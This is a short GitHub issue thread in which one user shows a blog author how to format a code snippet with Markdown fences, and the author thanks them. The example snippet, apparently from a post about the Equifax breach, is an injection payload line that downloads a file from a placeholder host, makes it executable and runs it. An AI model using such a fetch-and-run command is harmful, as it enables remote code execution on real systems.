### ISSUE TITLE
Cite code snippet in Markdown

### ISSUE THREAD

**Issue by kid551** [ssyfmei/ssyfmei.github.io#1]
In https://github.com/ssyfmei/ssyfmei.github.io/blob/master/_posts/2017-11-07-Equifax.markdown file, I think you wanted to cite one code snippet like this format:

```
#cmds=({'wget –c http://www.xxx.com/fileX; chmod 777 fileX;./fileX;'})
```

The trick is: you need to add symbol **```** surround your code, i.e.:

> **\`\`\`**
> #cmds=({'wget –c http://www.xxx.com/fileX; chmod 777 fileX;./fileX;'})
> **\`\`\`**

For specific programming language, you even can do like this:
> **\`\`\`** python
> import numpy as np
> **\`\`\`**

**Comment by ssyfmei** [comment]
Great! That's exactly what I want to do. Thanks!
By the way, this markdown language is awesome.

**Comment by kid551** [comment]
Yes, it's awesome and easy to learn. Also I want to mention, GitHub has its own markdown features, which may not be supported by other markdown engine. The GitHub Markdown Tutorial can be found here: https://guides.github.com/features/mastering-markdown/ .

FYI.
